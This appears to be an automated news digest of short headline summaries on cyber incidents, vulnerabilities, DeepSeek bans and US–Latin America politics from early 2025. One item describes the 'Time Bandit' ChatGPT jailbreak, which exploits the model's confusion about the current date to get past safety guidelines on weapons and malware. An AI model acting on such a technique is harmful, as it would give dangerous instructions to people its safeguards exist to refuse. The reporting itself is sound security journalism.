    Australia bans DeepSeek on government devices over security risk

    government
    2025-02-04 https://www.bbc.com/news/articles/c8d95v0nr1yo
    The Australian government says the Chinese AI app is a threat to it and its assets. "

    Autosummary: Growing – and familiar – concerns: Western countries have a track record of being suspicious of Chinese tech – notably telecoms firm Huawei and the social media platform TikTok – both of which have been restricted on national security grounds. "


    Zyxel won’t patch newly exploited flaws in end-of-life routers

    exploits
    2025-02-04 https://www.bleepingcomputer.com/news/security/zyxel-wont-patch-newly-exploited-flaws-in-end-of-life-routers/
    Zyxel has issued a security advisory about actively exploited flaws in CPE Series devices, warning that it has no plans to issue fixing patches and urging users to move to actively supported models. [...] "

    Autosummary: "We have confirmed that the affected models reported by VulnCheck, VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, and SBG3500, are legacy products that have reached end-of-life (EOL) for years," reads Zyxel’s advisory. "


    The hidden dangers of a toxic cybersecurity workplace

    ciber
    2025-02-03 https://www.helpnetsecurity.com/2025/02/03/rob-lee-sans-institute-toxic-cybersecurity-environment/

    In this Help Net Security interview, Rob Lee, Chief of Research and Head of Faculty at SANS Institute, discusses what a toxic environment looks like and how professionals can recognize red flags such as high turnover, burnout, and a pervasive fear of mistakes. Addressing these issues early is key to maintaining a healthy and effective team. Can you describe what a “toxic cybersecurity environment” looks like? What are some of the red flags professionals should … More

    The post The hidden dangers of a toxic cybersecurity workplace appeared first on Help Net Security.

    "

    Autosummary: In this Help Net Security interview, Rob Lee, Chief of Research and Head of Faculty at SANS Institute, discusses what a toxic environment looks like and how professionals can recognize red flags such as high turnover, burnout, and a pervasive fear of mistakes. From an organizational perspective, a toxic culture often leads to increased errors, missed threats, decreased productivity, and higher turnover rates. The constant pressure, combined with the growing complexity of threats, leads many CISOs to leave their positions, with some even vowing, “never again will I do this job.” "


    Crazy Evil Gang Targets Crypto with StealC, AMOS, and Angel Drainer Malware

    exploits
    2025-02-03 https://thehackernews.com/2025/02/crazy-evil-gang-targets-crypto-with.html
    A Russian-speaking cybercrime gang known as Crazy Evil has been linked to over 10 active social media scams that leverage a wide range of tailored lures to deceive victims and trick them into installing malware such as StealC, Atomic macOS Stealer (aka AMOS), and Angel Drainer. "Specializing in identity fraud, cryptocurrency theft, and information-stealing malware, Crazy Evil employs a "

    Autosummary: Newly recruited affiliates are directed by a threat actor-controlled Telegram bot to other private channels: Payments, which announces earnings for traffers; Logbar, which provides an audit trail of information stealer attacks, details about stolen data, and if the targets are repeat victims; Info, which provides regular administrative and technical updates for traffers; and Global Chat, which serves as a main communication space for discussions ranging from work to memes. The cybercrime group has been found to comprise six sub-teams, AVLAND, TYPED, DELAND, ZOOMLAND, DEFI, and KEVLAND, each of which has been attributed to a specific scam that involves duping victims into installing the tool from phony websites: AVLAND (aka AVS | RG or AVENGE), which leverages job offer and investment scams to propagate StealC and AMOS stealers under the guise of a Web3 communication tool named Voxium ("voxiumcalls[.]com"); TYPED, which propagates the AMOS stealer under the guise of an artificial intelligence software named TyperDex ("typerdex[.]ai"); DELAND, which propagates the AMOS stealer under the guise of a community development platform named DeMeet ("demeet[.]app"); ZOOMLAND, which leverages generic scams impersonating Zoom and WeChat ("app-whechat[.]com") to propagate the AMOS stealer; DEFI, which propagates the AMOS stealer under the guise of a digital asset management platform named Selenium Finance ("selenium[.]fi"); and KEVLAND, which propagates the AMOS stealer under the guise of an AI-enhanced virtual meeting software named Gatherum ("gatherum[.]ca"). "As Crazy Evil continues to achieve success, other cybercriminal entities are likely to emulate its methods, compelling security teams to remain perpetually vigilant to prevent widespread breaches and erosion of trust within the cryptocurrency, gaming, and software sectors," Recorded Future said. "TAG-124 comprises a network of compromised WordPress sites, actor-controlled payload servers, a central server, a suspected management server, an additional panel, and other components," it said. "


    Texas is the first state to ban DeepSeek on government devices

    government
    2025-02-03 https://securityaffairs.com/173764/laws-and-regulations/texas-bans-deepseek-and-rednote-govt-devices.html
    Texas bans DeepSeek and RedNote on government devices to block Chinese data-harvesting AI, citing security risks. Texas Governor Greg Abbott banned Chinese AI company DeepSeek and Chinese-owned social media apps Xiaohongshu (RedNote) and Lemon8 from all state-issued devices. The AI-powered chatbot, recently launched globally, has rapidly gained popularity reaching millions of users. Texas is the […] "

    Autosummary: This week, Italy’s Data Protection Authority Garante asked the AI firm DeepSeek to clarify its data collection, sources, purposes, legal basis, and storage, citing potential risks to user data. "


    DeepSeek’s popularity exploited to push malicious packages via PyPI

    exploits
    2025-02-03 https://www.helpnetsecurity.com/2025/02/03/deepseeks-popularity-exploited-to-push-malicious-packages-via-pypi/

    Two malicious packages leveraging the DeepSeek name have been published to the Python Package Index (PyPI) package repository, and in the 30 minutes or so they were up, they were downloaded 36 times. The malicious packages: The attack started on January 29, 2025, when an existing account published two packages. Named deepseeek and deepseekai, the packages were ostensibly client libraries for accessing and interacting with the DeepSeek AI API, but they contained functions … More

    The post DeepSeek’s popularity exploited to push malicious packages via PyPI appeared first on Help Net Security.

    "

    Autosummary: "


    ⚡ THN Weekly Recap: Top Cybersecurity Threats, Tools and Tips [27 February]

    ciber
    2025-02-03 https://thehackernews.com/2025/02/thn-weekly-recap-top-cybersecurity.html
    This week, our news radar shows that every new tech idea comes with its own challenges. A hot AI tool is under close watch, law enforcement is shutting down online spots that help cybercriminals, and teams are busy fixing software bugs that could let attackers in. From better locks on our devices to stopping sneaky tricks online, simple steps are making a big difference.  Let’s take a "

    Autosummary: This week's list includes — CVE-2025-0626, CVE-2024-12248, CVE-2025-0683 (Contec CMS8000), CVE-2025-22217 (Broadcom VMware Avi Load Balancer), CVE-2025-22218, CVE-2025-22219, CVE-2025-22220, CVE-2025-22221, CVE-2025-22222 (Broadcom VMware Aria Operations and Aria Operations for Logs), CVE-2024-55415, CVE-2024-55416, CVE-2024-55417 (PHP Voyager), CVE-2025-22604 (Cacti), CVE-2024-40891 (Zyxel), CVE-2025-23040 (GitHub Desktop), CVE-2024-52012 (Apache Solr), CVE-2025-0065 (TeamViewer), CVE-2024-12647, CVE-2024-12648, CVE-2024-12649 (Canon Laser Printers and Small Office Multifunctional Printers), CVE-2025-0493 (MultiVendorX plugin), CVE-2024-12822 (Media Manager for UserPro plugin), CVE-2025-0851 (Deep Java Library), CVE-2025-20061, CVE-2025-20014 (mySCADA myPRO), CVE-2024-13448 (ThemeREX Addons plugin), CVE-2025-0357 (WPBookit plugin), CVE-2024-1354 (Bootstrap Ultimate theme), CVE-2024-56404 (One Identity Identity Manager), CVE-2024-53299 (Apache Wicket), and CVE-2024-12857 (AdForest theme). "Consent for the processing of sensitive personal data, such as biometric data, must be free, informed, unequivocal and provided in a specific and highlighted manner, for specific purposes," the National Data Protection Authority (ANPD) said. Using the access provided by the vulnerability, an attacker who only knew the victim's last name and ZIP code, email address, phone number, or license plate could have remotely started, stopped, locked, or unlocked any vehicle. Apple Fixed an Actively Exploited Zero-Day — Apple released software updates for iOS, iPadOS, macOS, tvOS, visionOS, and watchOS to address a zero-day vulnerability (CVE-2025-24085) that it said has been exploited in the wild. Top News: Law Enforcement Operation Takes Down Illicit Cybercrime Services — A series of law enforcement operations have taken down various online marketplaces such as Cracked, Nulled, Sellix, StarkRDP, and HeartSender that sold hack tools, illegal goods, and crimeware solutions. — Brazilian data privacy regulators have prohibited Tools for Humanity (TFH), a biometric identity company co-founded by OpenAI CEO Sam Altman, from offering compensation to citizens for iris scans, saying such data collection practice interferes with a person's decision to grant consent for access to sensitive personal data. "


    Coyote Malware Expands Reach: Now Targets 1,030 Sites and 73 Financial Institutions

    financial exploits
    2025-02-03 https://thehackernews.com/2025/02/coyote-malware-expands-reach-now.html
    Brazilian Windows users are the target of a campaign that delivers a banking malware known as Coyote. "Once deployed, the Coyote Banking Trojan can carry out various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials," Fortinet FortiGuard Labs researcher Cara Lin said in an analysis published last week. The "

    Autosummary: "Once deployed, the Coyote Banking Trojan can carry out various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials," Fortinet FortiGuard Labs researcher Cara Lin said in an analysis published last week. "


    Chile lose as Garin refuses to play after collision

    latam
    2025-02-03 https://www.bbc.com/sport/tennis/articles/c9w5npn981jo
    Chile lose their Davis Cup qualifier against Belgium as Cristian Garin refuses to continue playing after being knocked over by Zizou Bergs. "

    Autosummary: "


    DeepSeek AI tools impersonated by infostealer malware on PyPI

    exploits
    2025-02-03 https://www.bleepingcomputer.com/news/security/deepseek-ai-tools-impersonated-by-infostealer-malware-on-pypi/
    Threat actors are taking advantage of the rise in popularity of DeepSeek to promote two malicious infostealer packages on the Python Package Index (PyPI), where they impersonated developer tools for the AI platform. [...] "

    Autosummary: Despite the quick detection and response, 222 developers downloaded the two packages, most from the United States (117), followed by China (36), Russia, Germany, Hong Kong, and Canada. "


    768 CVEs Exploited in 2024, Reflecting a 20% Increase from 639 in 2023

    exploits
    2025-02-03 https://thehackernews.com/2025/02/768-cves-exploited-in-2024-reflecting.html
    As many as 768 vulnerabilities with designated CVE identifiers were reported as exploited in the wild in 2024, up from 639 CVEs in 2023, registering a 20% increase year-over-year. Describing 2024 as "another banner year for threat actors targeting the exploitation of vulnerabilities," VulnCheck said 23.6% of known exploited vulnerabilities (KEV) were known to be weaponized either on or before "

    Autosummary: "


    Crazy Evil gang runs over 10 highly specialized social media scams

    financial
    2025-02-03 https://securityaffairs.com/173784/cyber-crime/crazy-evil-runs-10-social-media-scams.html
    The Russian-speaking Crazy Evil group runs over 10 social media scams, tricking victims into installing StealC, AMOS, and Angel Drainer malware. Since 2021, the Crazy Evil gang has become a major cybercriminal group, using phishing, identity fraud, and malware to steal cryptocurrency. Security experts identified six Crazy Evil subteams, called AVLAND, TYPED, DELAND, ZOOMLAND, DEFI, […] "

    Autosummary: The gang targets high-value victims, also called “mammoths,” for digital asset theft, including cryptocurrencies, payment cards, online banking accounts, and non-fungible tokens (NFTs). Security experts identified six Crazy Evil subteams, called AVLAND, TYPED, DELAND, ZOOMLAND, DEFI, and KEVLAND, which are running targeted scams for specific victim profiles. "


    Google fixes Android kernel zero-day exploited in attacks

    exploits Linux
    2025-02-03 https://www.bleepingcomputer.com/news/security/google-fixes-android-kernel-zero-day-exploited-in-attacks/
    The February 2025 Android security updates patch 48 vulnerabilities, including a zero-day kernel vulnerability that has been exploited in the wild. [...] "

    Autosummary: "


    Canadian charged with stealing $65 million using DeFI crypto exploits

    exploits
    2025-02-03 https://www.bleepingcomputer.com/news/security/canadian-charged-with-stealing-65-million-using-defi-crypto-exploits/
    The U.S. Justice Department has charged a Canadian man with stealing roughly $65 million after exploiting two decentralized finance (DeFI) protocols. [...] "

    Autosummary: "


    US and Mexico reach deal to put tariffs on hold - for now

    latam
    2025-02-03 https://www.bbc.com/news/articles/crke8jx5mvro
    A trade war between the US and Mexico has been temporarily averted after the two sides agreed a deal. "

    Autosummary: As well as reinforcing Mexico's northern border, and a commitment by the US that it would "work towards" curbing the flow of weapons to Mexico, Sheinbaum wrote the two countries would start work "today" to reach a deal on "security and trade". "


    Amazon Redshift gets new default settings to prevent data breaches

    financial
    2025-02-03 https://www.bleepingcomputer.com/news/security/amazon-redshift-gets-new-default-settings-to-prevent-data-breaches/
    Amazon has announced key security enhancements for Redshift, a popular data warehousing solution, to help prevent data exposures due to misconfigurations and insecure default settings. [...] "

    Autosummary: Strengthening Redshift security: Last week, AWS announced that it is implementing three security defaults for newly created provisioned clusters to significantly upgrade the platform's data safety and minimize the likelihood of catastrophic data leaks. "


    Ransomware attack hit Indian multinational Tata Technologies

    exploits
    2025-02-02 https://securityaffairs.com/173712/cyber-crime/tata-technologies-ransomware-attack.html
    Indian multinational technology company Tata Technologies suspended some IT services following a ransomware attack. Indian multinational Tata Technologies, a Tata Motors subsidiary, suspended some IT services following a ransomware attack. The company, which is engaged in product engineering, provides services to automotive and aerospace original equipment manufacturers as well as industrial machinery companies.  As of 2023, the IT giant has over […] "

    Autosummary: As of 2023, the IT giant has over 11,000 employees across 18 delivery centers worldwide, including India, North America, Europe, and Asia-Pacific. "


    Week in review: Apple 0-day used to target iPhones, DeepSeek’s popularity exploited by scammers

    financial exploits
    2025-02-02 https://www.helpnetsecurity.com/2025/02/02/week-in-review-apple-0-day-used-to-target-iphones-deepseeks-popularity-exploited-by-scammers/

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Apple zero-day vulnerability exploited to target iPhone users (CVE-2025-24085): Apple has shipped a fix for a zero-day vulnerability (CVE-2025-24085) that is being leveraged by attackers against iPhone users. 5,000+ SonicWall firewalls still open to attack (CVE-2024-53704): 5,000+ SonicWall firewalls are still vulnerable to attack via a high-severity vulnerability (CVE-2024-53704) that, according to SonicWall, should be considered “at imminent risk of … More

    The post Week in review: Apple 0-day used to target iPhones, DeepSeek’s popularity exploited by scammers appeared first on Help Net Security.

    "

    Autosummary: Infosec products of the month: January 2025. Here’s a look at the most interesting products from the past month, featuring releases from: Absolute Security, Atsign, authID, BackBox, BioConnect, BitSight, BreachLock, Cisco, Commvault, Compliance Scorecard, DataDome, Hiya, IT-Harvest, Lookout, McAfee, Netgear, Oasis Security, and Swimlane. 74% of CISOs are increasing crisis simulation budgets: In the aftermath of 2024’s high-profile cybersecurity incidents, including NHS, CrowdStrike, 23andMe, Transport for London, and Cencora, CISOs are reassessing their organisation’s readiness to manage a potential “chaos” of a full-scale cyber crisis, according to Hack The Box. "


    SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 31

    exploits
    2025-02-02 https://securityaffairs.com/173746/malware/security-affairs-malware-newsletter-round-31.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. ESXi Ransomware Attacks: Stealthy Persistence through SSH Tunneling; MintsLoader: StealC and BOINC Delivery; Cloud Ransomware Developments | The Risks of Customer-Managed Keys; New TorNet backdoor seen in widespread campaign; Active Exploitation: New Aquabot Variant Phones Home […] "

    Autosummary: "


    Rubio demands Panama "reduce China influence" over canal

    latam
    2025-02-02 https://www.bbc.com/news/articles/c39149p920no
    Secretary of State Marco Rubio visited the country amid US threats to retake control of the Panama Canal. "

    Autosummary: Rubio demands Panama "reduce China influence" over canal. Tom Bateman, State Department correspondent in Panama. US Secretary of State Marco Rubio, right, was greeted by Panamanian foreign minister Javier Martinez-Acha on his arrival in Panama City. US Secretary of State Marco Rubio has demanded that Panama make "immediate changes" to what he calls the "influence and control" of China over the Panama Canal. "There's a treaty that he has to respect, and there's nothing in the treaty that says that we cannot have ports run by the Chinese," she told the BBC, pointing out that there is Chinese investment in American ports and cities. "


    Malvertising Scam Uses Fake Google Ads to Hijack Microsoft Advertising Accounts

    financial
    2025-02-01 https://thehackernews.com/2025/02/malvertising-scam-uses-fake-google-ads.html
    Cybersecurity researchers have discovered a malvertising campaign that's targeting Microsoft advertisers with bogus Google ads that aim to take them to phishing pages that are capable of harvesting their credentials. "These malicious ads, appearing on Google Search, are designed to steal the login information of users trying to access Microsoft's advertising platform," Jérôme Segura, senior "

    Autosummary: "These malicious ads, appearing on Google Search, are designed to steal the login information of users trying to access Microsoft's advertising platform," Jérôme Segura, senior director of research at Malwarebytes, said in a Thursday report. "


    BeyondTrust Zero-Day Breach Exposed 17 SaaS Customers via Compromised API Key

    exploits
    2025-02-01 https://thehackernews.com/2025/02/beyondtrust-zero-day-breach-exposes-17.html
    BeyondTrust has revealed it completed an investigation into a recent cybersecurity incident that targeted some of the company's Remote Support SaaS instances by making use of a compromised API key. The company said the breach involved 17 Remote Support SaaS customers and that the API key was used to enable unauthorized access by resetting local application passwords. The breach was first flagged "

    Autosummary: "


    Barclays customers continue to experience issues after major IT outage

    ransomware
    2025-02-01 https://www.bbc.com/news/articles/cd9qzg92g72o
    Online banking, the bank's app and payments in and out of accounts are all affected. "

    Autosummary: "I've got my granddaughter here who's 11 months old, also a one-year-old, two-year-old, 12-year-old, 13-year-old, 15-year-old all at home." Scott, 27, and his wife, who is four months pregnant, said they had sold their house on Friday morning, but the money for their new home had not gone through yet due to the problems at Barclays. "


    A ransomware attack forced New York Blood Center to reschedule appointments

    exploits ransomware
    2025-02-01 https://securityaffairs.com/173702/cyber-crime/new-york-blood-center-faced-ransomware-attack.html
    The New York Blood Center faced a ransomware attack on Sunday, forcing the healthcare organization to reschedule appointments. The New York Blood Center suffered a ransomware attack on Sunday, causing appointment rescheduling. The New York Blood Center (NYBC) is a community, nonprofit blood bank based in New York City. The community was established in 1964 […] "

    Autosummary: A ransomware attack forced New York Blood Center to reschedule appointments. Pierluigi Paganini, February 01, 2025. The New York Blood Center faced a ransomware attack on Sunday, forcing the healthcare organization to reschedule appointments. "


    Trump hits China, Mexico and Canada with tariffs

    latam
    2025-02-01 https://www.bbc.com/news/articles/c627nx42xelo
    The US president will tax imports from America's three largest trading partners but retaliation is expected. "

    Autosummary: "Today's tariff announcement is necessary to hold China, Mexico, and Canada accountable for their promises to halt the flood of poisonous drugs into the United States," the White House said in a statement on X on Saturday. "


    Platformization is key to reduce cybersecurity complexity

    ciber
    2025-01-31 https://www.helpnetsecurity.com/2025/01/31/security-platformization-complexity/

    Organizations are facing security complexity challenges as they juggle an average of 83 different security solutions from 29 vendors, according to a report by IBM and Palo Alto Networks. It also shows 7 out of 10 surveyed companies with a high degree of security platformization report their cybersecurity investments have helped business outcomes such as operational efficiencies and revenue generation. The rising threat of sophisticated cyberattacks: In the study, 52% of surveyed executives note fragmentation … More

    The post Platformization is key to reduce cybersecurity complexity appeared first on Help Net Security.

    "

    Autosummary: The rising threat of sophisticated cyberattacks: In the study, 52% of surveyed executives note fragmentation of security solutions is limiting their ability to deal with cyber threats, but 75% of organizations that have embraced security platformization agree that better integration across security, hybrid cloud, AI, and other technology platforms is crucial. "


    CyberArk Identity Bridge manages user access and authentication for Linux environments

    Linux
    2025-01-31 https://www.helpnetsecurity.com/2025/01/31/cyberark-identity-bridge/

    CyberArk announced Identity Bridge, an endpoint identity security capability that will support identity and privilege sprawl reduction on Linux machines. Identity Bridge will enable organizations to authenticate to Linux systems using centralized accounts, minimizing dependence on outdated authentication methods. This helps modernize Identity and Access Management (IAM) without leaving Linux environments behind. Like all critical IT infrastructure, Linux systems are prime targets for cyberattacks, particularly via identity compromise. Managing identity and access on Linux systems … More

    The post CyberArk Identity Bridge manages user access and authentication for Linux environments appeared first on Help Net Security.

    "

    Autosummary: “Being able to manage user authentication and authorization across the entire IT infrastructure from a single, centralized location is a must to avoid identities and permissions sprawl, privilege escalation challenges, and excessive management overhead,” said Peretz Regev, CPO, CyberArk. "


    Broadcom Patches VMware Aria Flaws – Exploits May Lead to Credential Theft

    exploits
    2025-01-31 https://thehackernews.com/2025/01/broadcom-patches-vmware-aria-flaws.html
    Broadcom has released security updates to patch five security flaws impacting VMware Aria Operations and Aria Operations for Logs, warning customers that attackers could exploit them to gain elevated access or obtain sensitive information. The list of identified flaws, which impact versions 8.x of the software, is below - CVE-2025-22218 (CVSS score: 8.5) - A malicious actor with View Only Admin "

    Autosummary: "


    Indian tech giant Tata Technologies hit by ransomware attack

    exploits ransomware
    2025-01-31 https://www.bleepingcomputer.com/news/security/indian-tech-giant-tata-technologies-hit-by-ransomware-attack/
    Tata Technologies Ltd. had to suspend some of its IT services following a ransomware attack that impacted the company network. [...] "

    Autosummary: It is one of India’s key tech developers and state project contractors, employs over 11,000 people, has an annual revenue of $600 million, and operates 18 locations in India, North America, Europe, and Asia-Pacific. "


    Globe Life data breach may impact an additional 850,000 clients

    financial
    2025-01-31 https://www.bleepingcomputer.com/news/security/globe-life-data-breach-may-impact-an-additional-850-000-clients/
    Insurance giant Globe Life finished the investigation into the data breach it suffered last June and says that the incident may have impacted an additional 850,000 customers. [...] "

    Autosummary: "


    US healthcare provider data breach impacts 1 million patients

    financial
    2025-01-31 https://www.bleepingcomputer.com/news/security/data-breach-at-us-healthcare-provider-chc-impacts-1-million-patients/
    Community Health Center (CHC), a leading Connecticut healthcare provider, is notifying over 1 million patients that their personal and health information was stolen in an October breach. [...] "

    Autosummary: Depending on the affected patient, the attackers stole a combination of: personal (names, dates of birth, addresses, phone numbers, emails, Social Security numbers) or health information (medical diagnoses, treatment details, test results, and health insurance). "


    Community Health Center data breach impacted over 1 million patients

    financial
    2025-01-31 https://securityaffairs.com/173687/data-breach/community-health-center-data-breach.html
    Community Health Center (CHC) data breach impacted over 1 million patients in Connecticut, the healthcare provider started notifying them. Community Health Center (CHC) is a leading healthcare provider based in Connecticut, offering primary care, dental, behavioral health, and specialty services. It serves a diverse patient population, focusing on accessible and affordable healthcare, particularly for underserved […] "

    Autosummary: The exposed data may include patient name, birth date, contact info, diagnoses, treatments, test results, Social Security number, and health insurance details. "


    Trump to hit Canada, Mexico and China with tariffs on Saturday

    latam
    2025-01-31 https://www.bbc.com/news/articles/ckg0m79gm10o
    Canadian oil will be hit with a lower levy of 10%, likely by mid-February, President Trump says. "

    Autosummary: Trump to hit Canada, Mexico and China with tariffs on Saturday. Peter Hoskins, Business reporter. US President Donald Trump will impose tariffs on Saturday of 25% on Mexico, 25% on Canada and 10% on China, says the White House. "


    "Outlandish comments": US, Canada and Mexico go toe-to-toe over tariffs

    latam
    2025-01-31 https://www.bbc.com/news/videos/c1dgzlg69q7o
    Press Secretary Karoline Leavitt said the duties were in response to "illegal fentanyl" both countries "allowed to distribute" into the US. "

    Autosummary: "


    New Aquabotv3 botnet malware targets Mitel command injection flaw

    exploits
    2025-01-30 https://www.bleepingcomputer.com/news/security/new-aquabotv3-botnet-malware-targets-mitel-command-injection-flaw/
    A new variant of the Mirai-based botnet malware Aquabot has been observed actively exploiting CVE-2024-41710, a command injection vulnerability in Mitel SIP phones. [...] "

    Autosummary: Next, it attempts to spread to other IoT devices using the Mitel exploit, CVE-2018-17532 (TP-Link), CVE-2023-26801 (IoT firmware RCE), CVE-2022-31137 (Web App RCE), Linksys E-series RCE, Hadoop YARN, and CVE-2018-10562 / CVE-2018-10561 (Dasan router bugs). "


    ExtensionHound: Open-source tool for Chrome extension DNS forensics

    industry
    2025-01-30 https://www.helpnetsecurity.com/2025/01/30/extensionhound-open-source-tool-chrome-extension-dns-forensics/

    Traditional monitoring tools reveal only traffic from the Chrome process, leaving security teams uncertain about which extension is responsible for a suspicious DNS query. ExtensionHound solves this by analyzing Chrome’s internal network state and linking DNS activity to specific extensions. ExtensionHound features: scans Chrome profiles for extension DNS request history; provides detailed analysis of network connections; optional VirusTotal integration for domain reputation checking; multiple output formats (Console, CSV, JSON); cross-platform support (Windows, macOS, Linux). “This … More

    The post ExtensionHound: Open-source tool for Chrome extension DNS forensics appeared first on Help Net Security.

    "

    Autosummary: "


    Unpatched PHP Voyager Flaws Leave Servers Open to One-Click RCE Exploits

    exploits
    2025-01-30 https://thehackernews.com/2025/01/unpatched-php-voyager-flaws-leave.html
    Three security flaws have been disclosed in the open-source PHP package Voyager that could be exploited by an attacker to achieve one-click remote code execution on affected instances. "When an authenticated Voyager user clicks on a malicious link, attackers can execute arbitrary code on the server," Sonar researcher Yaniv Nizry said in a write-up published earlier this week. The "

    Autosummary: "


    New Aquabot Botnet Exploits CVE-2024-41710 in Mitel Phones for DDoS Attacks

    exploits
    2025-01-30 https://thehackernews.com/2025/01/new-aquabot-botnet-exploits-cve-2024.html
    A Mirai botnet variant dubbed Aquabot has been observed actively attempting to exploit a medium-severity security flaw impacting Mitel phones in order to ensnare them into a network capable of mounting distributed denial-of-service (DDoS) attacks. The vulnerability in question is CVE-2024-41710 (CVSS score: 6.8), a case of command injection in the boot process that could allow a malicious actor "

    Autosummary: Outside of CVE-2024-41710, some of the other vulnerabilities targeted by the botnet include CVE-2018-10561, CVE-2018-10562, CVE-2018-17532, CVE-2022-31137, CVE-2023-26801, and a remote code execution flaw targeting Linksys E-series devices. "


    Time Bandit ChatGPT jailbreak bypasses safeguards on sensitive topics

    industry
    2025-01-30 https://www.bleepingcomputer.com/news/security/time-bandit-chatgpt-jailbreak-bypasses-safeguards-on-sensitive-topics/
    A ChatGPT jailbreak flaw, dubbed "Time Bandit," allows you to bypass OpenAI's safety guidelines when asking for detailed instructions on sensitive topics, including the creation of weapons, information on nuclear topics, and malware creation. [...] "

    Autosummary: "I was working on something else entirely - interpretability research - when I noticed temporal confusion in the 4o model of ChatGPT," Kuzmar told BleepingComputer. "This tied into a hypothesis I had about emergent intelligence and awareness, so I probed further, and realized the model was completely unable to ascertain its current temporal context, aside from running a code-based query to see what time it is." "


    PHP package Voyager flaws expose to one-click RCE exploits

    exploits
    2025-01-30 https://securityaffairs.com/173646/hacking/php-package-voyager-flaws.html
    The open-source PHP package Voyager is affected by three vulnerabilities that could be exploited to achieve one-click remote code execution on affected instances. Voyager is a popular open-source PHP package for managing Laravel applications, offering an admin interface, BREAD operations, media, and user management. During an ordinary scan activity, SonarSource researchers reported an arbitrary file write vulnerability in […] "

    Autosummary: PHP package Voyager flaws expose to one-click RCE exploits. Pierluigi Paganini, January 30, 2025. The open-source PHP package Voyager is affected by three vulnerabilities that could be exploited to achieve one-click remote code execution on affected instances. "


    SimpleHelp RMM vulnerabilities may have been exploited to breach healthcare orgs

    exploits
    2025-01-30 https://www.helpnetsecurity.com/2025/01/30/simplehelp-rmm-vulnerabilities-may-have-been-exploited-to-breach-healthcare-orgs/

    Attackers may have leveraged vulnerabilities in the SimpleHelp remote monitoring and management solution to gain initial access to healthcare organizations. About the vulnerabilities: On January 13, 2025, Horizon3.ai researchers revealed their discovery of three vulnerabilities affecting SimpleHelp’s server component, which would allow attackers to: download files from the SimpleHelp server (e.g., log and configuration files); use access credentials extracted from config files to authenticate to the server, elevate their privileges to admin, and upload files, … More

    The post SimpleHelp RMM vulnerabilities may have been exploited to breach healthcare orgs appeared first on Help Net Security.

    "

    Autosummary: Use access credentials extracted from config files to authenticate to the server, elevate their privileges to admin, and upload files, execute commands, or even access remote machines with the SimpleHelp client support application installed (if the “unattended access” option is switched on). "


    Google: Over 57 Nation-State Threat Groups Using AI for Cyber Operations

    government
    2025-01-30 https://thehackernews.com/2025/01/google-over-57-nation-state-threat.html
    Over 57 distinct threat actors with ties to China, Iran, North Korea, and Russia have been observed using artificial intelligence (AI) technology powered by Google to further enable their malicious cyber and information operations. "Threat actors are experimenting with Gemini to enable their operations, finding productivity gains but not yet developing novel capabilities," Google Threat "

    Autosummary: Government-backed attackers, otherwise known as Advanced Persistent Threat (APT) groups, have sought to use its tools to bolster multiple phases of the attack cycle, including coding and scripting tasks, payload development, gathering information about potential targets, researching publicly known vulnerabilities, and enabling post-compromise activities, such as defense evasion. "


    Lightning AI Studio Vulnerability Allowed RCE via Hidden URL Parameter

    exploits
    2025-01-30 https://thehackernews.com/2025/01/lightning-ai-studio-vulnerability.html
    Cybersecurity researchers have disclosed a critical security flaw in the Lightning AI Studio development platform that, if successfully exploited, could allow for remote code execution. The vulnerability, rated a CVSS score of 9.4, enables "attackers to potentially execute arbitrary commands with root privileges" by exploiting a hidden URL parameter, application security firm Noma said in a "

    Autosummary: "


    TeamViewer fixed a vulnerability in Windows client and host applications

    exploits
    2025-01-30 https://securityaffairs.com/173658/security/teamviewer-windows-client-flaw.html
    TeamViewer has patched a high-severity elevation of privilege vulnerability, tracked as CVE-2025-0065 (CVSS score of 7.8), affecting its Windows client and host applications. The vulnerability is an improper neutralization of argument delimiters in the TeamViewer_service.exe component of TeamViewer […] "

    Autosummary: "


    Mexico asks Google Maps not to rename Gulf of Mexico

    latam
    2025-01-30 https://www.bbc.com/news/articles/clyn1rgngn8o
    US President Donald Trump has ordered that the body of water be renamed the Gulf of America. "

    Autosummary: "


    Ransomware attack disrupts New York blood donation giant

    exploits
    2025-01-30 https://www.bleepingcomputer.com/news/security/ransomware-attack-disrupts-new-york-blood-donation-giant/
    The New York Blood Center (NYBC), one of the world's largest independent blood collection and distribution organizations, says a Sunday ransomware attack forced it to reschedule some appointments. [...] "

    Autosummary: In December, the U.S. Department of Health and Human Services (HHS) proposed updates to HIPAA (short for Health Insurance Portability and Accountability Act of 1996) to secure patients' health data following a surge of massive healthcare security breaches affecting U.S. hospitals and Americans in recent years, including the February Change Healthcare ransomware attack that affected 190 million individuals. "


    Only 13% of organizations fully recover data after a ransomware attack

    exploits ransomware
    2025-01-29 https://www.helpnetsecurity.com/2025/01/29/ransomware-attacks-business-operations-disruption/

    Ransomware attacks are disrupting and undermining business operations and draining revenue streams, according to Illumio. Findings from the study reveal that 58% of organizations had to shut down operations following a ransomware attack, up from 45% in 2021. 40% reported a significant loss of revenue (up from 22% in 2021); 41% lost customers; and 40% had to eliminate jobs. Attackers are reaching critical systems to cause maximum disruption Ransomware attacks impacted 25% of critical systems, … More

    The post Only 13% of organizations fully recover data after a ransomware attack appeared first on Help Net Security.

    "

    Autosummary: According to the research, 29% of IT budgets are allocated to staff and technologies meant to prevent, detect, contain, and resolve ransomware attacks, yet attacks are still successful. 40% are confident in the ability of employees to detect social engineering lures (up from 30% in 2021), however, insider negligence is the top challenge when responding to ransomware attacks. "


    Preparing financial institutions for the next generation of cyber threats

    financial
    2025-01-29 https://www.helpnetsecurity.com/2025/01/29/james-mirfin-visa-financial-institutions-threats/

    In this Help Net Security interview, James Mirfin, SVP and Head of Risk and Identity Solutions at Visa, discusses key priorities for leaders combating fraud, the next-generation threats institutions must prepare for, and the role of collaboration between financial sectors and government agencies in countering cybercrime. If you were to advise a newly appointed leader against fraud in a financial institution, what three priorities would you recommend they focus on immediately? As a newly appointed … More

    The post Preparing financial institutions for the next generation of cyber threats appeared first on Help Net Security.

    "

